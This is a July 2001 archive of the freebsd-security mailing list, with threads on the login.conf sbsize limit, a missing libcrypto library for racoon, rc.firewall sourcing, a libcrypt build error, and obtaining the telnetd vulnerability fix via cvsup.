"unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 11:46:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from vl7.net (OL51-141.fibertel.com.ar [24.232.141.51]) by hub.freebsd.org (Postfix) with ESMTP id D3B4A37B403 for ; Mon, 23 Jul 2001 11:46:29 -0700 (PDT) (envelope-from fox@vl7.net) Received: from localhost (fox@localhost) by vl7.net (8.11.3/8.11.3) with ESMTP id f6NIox535697 for ; Mon, 23 Jul 2001 15:51:06 -0300 (ART) (envelope-from fox@vl7.net) Date: Mon, 23 Jul 2001 15:50:59 -0300 (ART) From: Vladimir To: Subject: login.conf Message-ID: <20010723154028.B35681-100000@vl7.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, All! I tried to configure my login.conf, so I have one question about parametr "sbsize", what limititing is this parametr, what is recommended size of socket buffer, what depend of this buffer? I checked man's but found nothing about this :( Thank you. Best regards, Vladimir. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 11:50:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 9C2E137B409 for ; Mon, 23 Jul 2001 11:50:27 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 57699 invoked by uid 1000); 23 Jul 2001 18:49:34 -0000 Date: Mon, 23 Jul 2001 21:49:34 +0300 From: Peter Pentchev To: Ewan Carr Cc: FreeBSD-Security@FreeBSD.Org Subject: Re: libcrypto.o.2 Message-ID: <20010723214933.A55298@ringworld.oblivion.bg> Mail-Followup-To: Ewan Carr , FreeBSD-Security@FreeBSD.Org References: <20010723160056.98649.qmail@web13308.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010723160056.98649.qmail@web13308.mail.yahoo.com>; from ewancarr@yahoo.com on Mon, Jul 23, 2001 at 05:00:56PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jul 23, 2001 at 05:00:56PM +0100, Ewan Carr wrote: > Hi, > > Any pointers on the problem below would be > appreciated - ta ! > > Installed FreeBSD 4.2 successfully > from CD > Installed racoon (racoon-20010418a.tgz) > from web successfully. > > When running racoon I get the following > problem > /usr/libexec/ld-elf.so.1 Shared object > "libcrypto.so.2" > not found ? > > Do I need an earlier version of racoon ? When you installed 4.2 from the CD, did you also install the crypto distribution? G'luck, Peter -- Do you think anybody has ever had *precisely this thought* before? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 12: 8:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13307.mail.yahoo.com (web13307.mail.yahoo.com [216.136.175.43]) by hub.freebsd.org (Postfix) with SMTP id 0DE6837B405 for ; Mon, 23 Jul 2001 12:08:17 -0700 (PDT) (envelope-from sumirati@yahoo.de) Message-ID: <20010723190816.15888.qmail@web13307.mail.yahoo.com> Received: from [193.174.9.99] by web13307.mail.yahoo.com via HTTP; Mon, 23 Jul 2001 21:08:16 CEST Date: Mon, 23 Jul 2001 21:08:16 +0200 (CEST) From: =?iso-8859-1?q?m=20p?= Subject: Re: login.conf To: fox@vl7.net Cc: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Hi, All! > I tried to configure my login.conf, so I have one question about parametr > "sbsize", what limititing is this parametr, what is recommended size of > socket buffer, what depend of this buffer? I checked man's but found > nothing about this :( > > Thank you. > > Best regards, > Vladimir. Taken from the handbook of 4.3-RELEASE, section 6.6 sbsize This is the limit on the amount of network memory, and thus mbufs, a user may consume. This originated as a response to an old DoS attack by creating a lot of sockets, but can be generally used to limit network communications. Hope this helps marc __________________________________________________________________ Do You Yahoo!? Gesendet von Yahoo! Mail - http://mail.yahoo.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 12:55:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from intense.net (server.intense.net [199.217.236.1]) by hub.freebsd.org (Postfix) with ESMTP id 11A3537B401 for ; Mon, 23 Jul 2001 12:55:53 -0700 (PDT) (envelope-from bobber@intense.net) Received: from bob ([209.248.134.245]) by intense.net (8.8.8/8.8.8) with SMTP id OAA48831 for ; Mon, 23 Jul 2001 14:55:51 -0500 (CDT) Message-ID: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> From: "Robert Herrold" To: Subject: telnet exploit Date: Mon, 23 Jul 2001 14:52:46 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_03AA_01C11387.22A47340" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_03AA_01C11387.22A47340 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I have never used cvsup before, and I'm a little confused about the = current possible patch/fix.=20 First off, is there a 'patch/fix/replacement for telnetd' = (/usr/libexec/telnetd). If so, would that be included in the cvsup?=20 Secondly, I've read through the cvsup documentation, and I'm a little = unclear on whether it is basically just downloading source, or is it = adding the packages. (do I need to recompile?) Any help would be greatly appreciated. Bob Herrold Senior Network Engineer Metropark Communications=20 10405 A Baur Blvd St Louis MO 63132 (314)439-1900 ------=_NextPart_000_03AA_01C11387.22A47340 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I have never used cvsup before, and I'm = a little=20 confused about the current possible patch/fix.
 
First off, is there a = 'patch/fix/replacement for=20 telnetd' (/usr/libexec/telnetd). If so, would that be included in the = cvsup?=20
 
Secondly, I've read through the cvsup=20 documentation, and I'm a little unclear on whether it is basically just=20 downloading source, or is it adding the packages. (do I need to=20 recompile?)
 
Any help would be greatly = appreciated.
 
 
Bob Herrold
Senior Network = Engineer
Metropark=20 Communications
10405 A Baur Blvd
St Louis MO=20 63132
(314)439-1900
------=_NextPart_000_03AA_01C11387.22A47340-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 13:47:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-215.dsl.lsan03.pacbell.net [63.207.60.215]) by hub.freebsd.org (Postfix) with ESMTP id 5024937B41A for ; Mon, 23 Jul 2001 13:45:36 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 6126066CC1; Mon, 23 Jul 2001 13:45:35 -0700 (PDT) Date: Mon, 23 Jul 2001 13:45:34 -0700 From: Kris Kennaway To: Ewan Carr Cc: FreeBSD-Security@FreeBSD.ORG Subject: Re: libcrypto.o.2 Message-ID: <20010723134533.B86969@xor.obsecurity.org> References: <20010723160056.98649.qmail@web13308.mail.yahoo.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="lrZ03NoBR/3+SXJZ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010723160056.98649.qmail@web13308.mail.yahoo.com>; from ewancarr@yahoo.com on Mon, Jul 23, 2001 at 05:00:56PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --lrZ03NoBR/3+SXJZ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable No, you need to install the 'crypto' distribution parts of the FreeBSD base system. Go back to sysinstall and do that. Kris On Mon, Jul 23, 2001 at 05:00:56PM +0100, Ewan Carr wrote: > Hi, >=20 > Any pointers on the problem below would be > appreciated - ta ! >=20 > Installed FreeBSD 4.2 successfully > from CD > Installed racoon (racoon-20010418a.tgz) > from web successfully. >=20 > When running racoon I get the following > problem > /usr/libexec/ld-elf.so.1 Shared object > "libcrypto.so.2" > not found ? >=20 > Do I need an earlier version of racoon ? >=20 > ps. > could you cc ewancarr@yahoo.com - i do not subscribe > to the list - thanks again >=20 >=20 >=20 > ____________________________________________________________ > Do You Yahoo!? > Get your free @yahoo.co.uk address at http://mail.yahoo.co.uk > or your free @yahoo.ie address at http://mail.yahoo.ie >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --lrZ03NoBR/3+SXJZ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XIzsWry0BWjoQKURAuNEAJkBnYBiz9Cp86g0h/mVNhBxVQkuKgCgqnJ5 B0QzojiwyfMK3bRWnL423+g= =amut -----END PGP SIGNATURE----- --lrZ03NoBR/3+SXJZ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 13:55:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr1.ericy.com (imr1.ericy.com [208.237.135.240]) by hub.freebsd.org (Postfix) with ESMTP id E056537B408 for ; Mon, 23 Jul 2001 13:55:41 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr7.exu.ericsson.se (mr7u3.ericy.com [208.237.135.122]) by imr1.ericy.com (8.11.3/8.11.3) with ESMTP id f6NKtfp02605 for ; Mon, 23 Jul 2001 15:55:41 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr7.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f6NKte111309 for ; Mon, 23 Jul 2001 15:55:41 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f6NKteA14977 for ; Mon, 23 Jul 2001 16:55:40 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Mon, 23 Jul 2001 16:55:39 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id PPVKMLW2; Mon, 23 Jul 2001 16:55:36 -0400 From: "Antoine Beaupre (LMC)" To: freebsd-security@FreeBSD.ORG Message-ID: <3B5C8F47.5050300@lmc.ericsson.se> Date: Mon, 23 Jul 2001 16:55:35 -0400 Organization: LMC, Ericsson Research Canada User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2+) Gecko/20010717 X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: rc.firewall change comments request Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi. I find that using a custom ruleset is a pain in the current rc.firewall setup. For example, since alternate setups are sourced using "ipfw" instead of the shell, you do not have access to valuable variables and conditionals, being limited to ipfw' syntax. I use conditionals and variables to make the config file more readable. I think that having a flat ipfw source file is unpractical and hard to maintain. What I suggest is to change the way of sourcing alternate config files. Instead of doing: *) if [ -r "${firewall_type}" ]; then ${fwcmd} ${firewall_flags} ${firewall_type} rc.firewall should be doing: *) if [ -r "${firewall_type}" ]; then . ${firewall_type}` What do you people think about that? Should I submit a pr? Thanks, A. -- Antoine Beaupré Jambala TCM team Ericsson Canada inc. mailto:antoine.beaupre@ericsson.ca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 14:13: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-215.dsl.lsan03.pacbell.net [63.207.60.215]) by hub.freebsd.org (Postfix) with ESMTP id 1532A37B406 for ; Mon, 23 Jul 2001 14:12:57 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id A2B0D67CF8; Mon, 23 Jul 2001 14:12:54 -0700 (PDT) Date: Mon, 23 Jul 2001 14:12:50 -0700 From: Kris Kennaway To: Joseph Cc: freebsd-security@FreeBSD.ORG Subject: Re: Make world - crypt-blowfish.c error Message-ID: <20010723141245.A96187@xor.obsecurity.org> References: <5.1.0.14.0.20010723123615.00aebd90@10.100.0.5> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="HcAYCG3uE/tztfnV" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.1.0.14.0.20010723123615.00aebd90@10.100.0.5>; from jolt-mail@nicholasofmyra.org on Mon, Jul 23, 2001 at 12:53:33PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --HcAYCG3uE/tztfnV Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable You didn't cvsup the src-crypto collection. Kris On Mon, Jul 23, 2001 at 12:53:33PM -0400, Joseph wrote: > I'm not sure what, if anything, I'm doing wrong. I've installed FreeBSD= =20 > 4.3 with the src tree. I could do a make world fine after the initial=20 > installation. I cvsup'ed, and now I keep getting this error. >=20 > make world >=20 > or >=20 > cd /usr/src/lib/libcrypt/ > make >=20 > results in: > make: don't know how to make crypt-blowfish.c. Stop >=20 > Any suggestions? >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --HcAYCG3uE/tztfnV Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XJNKWry0BWjoQKURAl1HAJ9EvhHus9v4k9eUnhAco0dlmKzQ2gCg/OrA Fa9RXPmdHM0ltjCySN51D24= =VqrI -----END PGP SIGNATURE----- --HcAYCG3uE/tztfnV-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 14:16:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-215.dsl.lsan03.pacbell.net [63.207.60.215]) by hub.freebsd.org (Postfix) with ESMTP id 4591F37B406 for ; Mon, 23 Jul 2001 14:16:26 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id A12BB68127; Mon, 23 Jul 2001 14:16:24 -0700 (PDT) Date: Mon, 23 Jul 2001 14:16:24 -0700 From: Kris Kennaway To: Chuck Rock Cc: security@FreeBSD.ORG Subject: Re: telnetd root exploit Message-ID: <20010723141609.B96187@xor.obsecurity.org> References: <20010722120932.E56521@osaka.louisville.edu> <004d01c11399$dd3d9850$1805010a@epconline.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="98e8jtXdkpgskNou" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <004d01c11399$dd3d9850$1805010a@epconline.net>; from carock@epconline.net on Mon, Jul 23, 2001 at 12:06:50PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --98e8jtXdkpgskNou Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Jul 23, 2001 at 12:06:50PM -0500, Chuck Rock wrote: > Until an official advisory is released, does that mean there's no official > patch yet? Correct. The patches posted here last week were incomplete; I'm still hoping to get the advisory out later today. Kris --98e8jtXdkpgskNou Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XJQZWry0BWjoQKURAnkuAJ0fQrW/ONicrrXt3jtBanZ1bra7CQCgjc98 iew/8Rx40/vB9NQGatPALNA= =jhru -----END PGP SIGNATURE----- --98e8jtXdkpgskNou-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 14:41:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailc.telia.com (mailc.telia.com [194.22.190.4]) by hub.freebsd.org (Postfix) with ESMTP id E322E37B403 for ; Mon, 23 Jul 2001 14:41:01 -0700 (PDT) (envelope-from ertr1013@student.uu.se) Received: from d1o913.telia.com (d1o913.telia.com [195.252.44.241]) by mailc.telia.com (8.11.2/8.11.0) with ESMTP id f6NLf0A04386 for ; Mon, 23 Jul 2001 23:41:00 +0200 (CEST) Received: from ertr1013.student.uu.se (h185n2fls20o913.telia.com [212.181.163.185]) by d1o913.telia.com (8.8.8/8.8.8) with SMTP id XAA16619 for ; Mon, 23 Jul 2001 23:40:58 +0200 (CEST) Received: (qmail 69294 invoked by uid 1001); 23 Jul 2001 21:40:08 -0000 Date: Mon, 23 Jul 2001 23:40:07 +0200 From: Erik Trulsson To: Robert Herrold Cc: freebsd-security@FreeBSD.ORG Subject: Re: telnet exploit Message-ID: <20010723234007.A69282@student.uu.se> Mail-Followup-To: Robert Herrold , freebsd-security@FreeBSD.ORG References: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> User-Agent: Mutt/1.3.19i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [Please remember to wrap your lines at < 80 columns] On Mon, Jul 23, 2001 at 02:52:46PM -0500, Robert Herrold wrote: > I have never used cvsup before, and I'm a little confused about the > current possible patch/fix. > > First off, is there a 'patch/fix/replacement for telnetd' > (/usr/libexec/telnetd). If so, would that be included in the cvsup? There has been a fix committed so, yes, cvsup would get the fixed version. > > Secondly, I've read through the cvsup documentation, and I'm a little > unclear on whether it is basically just downloading source, or is it > adding the packages. (do I need to recompile?) > Cvsup downloads the source. You need to recompile afterwards. > Any help would be greatly appreciated. > -- Erik Trulsson ertr1013@student.uu.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 14:53:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [66.92.98.149]) by hub.freebsd.org (Postfix) with SMTP id CBBC637B409 for ; Mon, 23 Jul 2001 14:53:26 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 67252 invoked from network); 23 Jul 2001 21:53:31 -0000 Received: from localhost.nexgen.com (HELO alexus) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 23 Jul 2001 21:53:31 -0000 Message-ID: <001401c113c1$e43551c0$0d00a8c0@alexus> From: "alexus" To: "Erik Trulsson" , "Robert Herrold" Cc: References: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> <20010723234007.A69282@student.uu.se> Subject: Re: telnet exploit Date: Mon, 23 Jul 2001 17:53:21 -0400 Organization: NexGen MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2499.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2499.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org what about those folks who prefer to stay running releaes instead of current? ----- Original Message ----- From: "Erik Trulsson" To: "Robert Herrold" Cc: Sent: Monday, July 23, 2001 5:40 PM Subject: Re: telnet exploit > [Please remember to wrap your lines at < 80 columns] > > On Mon, Jul 23, 2001 at 02:52:46PM -0500, Robert Herrold wrote: > > I have never used cvsup before, and I'm a little confused about the > > current possible patch/fix. > > > > First off, is there a 'patch/fix/replacement for telnetd' > > (/usr/libexec/telnetd). If so, would that be included in the cvsup? > > There has been a fix committed so, yes, cvsup would get the fixed > version. > > > > > Secondly, I've read through the cvsup documentation, and I'm a little > > unclear on whether it is basically just downloading source, or is it > > adding the packages. (do I need to recompile?) > > > > Cvsup downloads the source. You need to recompile afterwards. > > > Any help would be greatly appreciated. > > > > > > -- > > Erik Trulsson > ertr1013@student.uu.se > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 15: 1:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.tgd.net (rand.tgd.net [64.81.67.117]) by hub.freebsd.org (Postfix) with SMTP id 6756237B408 for ; Mon, 23 Jul 2001 15:01:26 -0700 (PDT) (envelope-from sean@mailhost.tgd.net) Received: (qmail 35100 invoked by uid 1001); 23 Jul 2001 22:01:22 -0000 Date: Mon, 23 Jul 2001 15:01:22 -0700 From: Sean Chittenden To: alexus Cc: freebsd-security@FreeBSD.ORG Subject: Re: telnet exploit Message-ID: <20010723150122.E34549@rand.tgd.net> References: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> <20010723234007.A69282@student.uu.se> <001401c113c1$e43551c0$0d00a8c0@alexus> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="doKZ0ri6bHmN2Q5y" Content-Disposition: inline In-Reply-To: <001401c113c1$e43551c0$0d00a8c0@alexus>; from "ml@db.nexgen.com" on Mon, Jul 23, 2001 at = 05:53:21PM X-PGP-Key: 0x1EDDFAAD X-PGP-Fingerprint: C665 A17F 9A56 286C 5CFB 1DEA 9F4F 5CEF 1EDD FAAD X-Web-Homepage: http://sean.chittenden.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --doKZ0ri6bHmN2Q5y Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable cvsup can be used to track -stable and -release. Check out chapter 20 of the handbook, and look through the -stable and -questions mail archives for more information on this. RELENG_2_2 was MFC'ed earlier today so I imagine that RELENG_4 has already been MFC'ed. -sc PS -questions is probably a better place to ask this than=20 -security. > what about those folks who prefer to stay running releaes instead of > current? >=20 > > [Please remember to wrap your lines at < 80 columns] > > > > On Mon, Jul 23, 2001 at 02:52:46PM -0500, Robert Herrold wrote: > > > I have never used cvsup before, and I'm a little confused about the > > > current possible patch/fix. > > > > > > First off, is there a 'patch/fix/replacement for telnetd' > > > (/usr/libexec/telnetd). If so, would that be included in the cvsup? > > > > There has been a fix committed so, yes, cvsup would get the fixed > > version. > > > > > > > > Secondly, I've read through the cvsup documentation, and I'm a little > > > unclear on whether it is basically just downloading source, or is it > > > adding the packages. (do I need to recompile?) > > > > > > > Cvsup downloads the source. You need to recompile afterwards. > > > > > Any help would be greatly appreciated. --=20 Sean Chittenden --doKZ0ri6bHmN2Q5y Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: Sean Chittenden iEYEARECAAYFAjtcnrEACgkQn09c7x7d+q1KvwCePr0bEKRA/Jrwnkhw5QFSvZIW UbAAoKbOr6bYvKNXTRf9YtfZ6AHH7TUA =L+cJ -----END PGP SIGNATURE----- --doKZ0ri6bHmN2Q5y-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 15:26:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 3C7C737B408 for ; Mon, 23 Jul 2001 15:26:11 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 49CCB1360E; Mon, 23 Jul 2001 18:26:10 -0400 (EDT) Date: Mon, 23 Jul 2001 18:26:10 -0400 From: Chris Faulhaber To: alexus Cc: Erik Trulsson , Robert Herrold , freebsd-security@FreeBSD.ORG Subject: Re: telnet exploit Message-ID: <20010723182610.A37637@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , alexus , Erik Trulsson , Robert Herrold , freebsd-security@FreeBSD.ORG References: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> <20010723234007.A69282@student.uu.se> <001401c113c1$e43551c0$0d00a8c0@alexus> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="uAKRQypu60I7Lcqm" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001401c113c1$e43551c0$0d00a8c0@alexus>; from ml@db.nexgen.com on Mon, Jul 23, 2001 at 05:53:21PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --uAKRQypu60I7Lcqm Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jul 23, 2001 at 05:53:21PM -0400, alexus wrote: > what about those folks who prefer to stay running releaes instead of > current? >=20 use RELENG_4_3, which is 4.3-RELEASE with security patches --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --uAKRQypu60I7Lcqm Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjtcpIEACgkQObaG4P6BelAuqACdFBKbCK6NNthgMeqgCwoq8LKZ 6UEAoJKnert7ls4KRzShADyLXnqX5s99 =AEsO -----END PGP SIGNATURE----- --uAKRQypu60I7Lcqm-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 16: 6:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id E8E9E37B401 for ; Mon, 23 Jul 2001 16:06:31 -0700 (PDT) (envelope-from gshapiro@gshapiro.net) Received: from horsey.gshapiro.net (gshapiro@localhost [127.0.0.1]) by horsey.gshapiro.net (8.12.0.Beta16/8.12.0.Beta16) with ESMTP id f6NN6PHk001793 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Mon, 23 Jul 2001 16:06:25 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta16/8.12.0.Beta16) id f6NN6PsA001790; Mon, 23 Jul 2001 16:06:25 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15196.44529.197423.239149@horsey.gshapiro.net> Date: Mon, 23 Jul 2001 16:06:25 -0700 From: Gregory Neil Shapiro To: "Antoine Beaupre (LMC)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: rc.firewall change comments request In-Reply-To: <3B5C8F47.5050300@lmc.ericsson.se> References: <3B5C8F47.5050300@lmc.ericsson.se> X-Mailer: VM 6.92 under 21.5 (beta1) "anise" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Antoine.Beaupre> For example, since alternate setups are sourced using Antoine.Beaupre> "ipfw" instead of the shell, you do not have access to Antoine.Beaupre> valuable variables and conditionals, being limited to Antoine.Beaupre> ipfw' syntax. Antoine.Beaupre> I use conditionals and variables to make the config file Antoine.Beaupre> more readable. Antoine.Beaupre> I think that having a flat ipfw source file is unpractical Antoine.Beaupre> and hard to maintain. Why not just set firewall_script in your /etc/rc.conf? firewall_script="/etc/rc.firewall" # Which script to run to set up the firewall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 16:20:46 2001 Delivered-To: 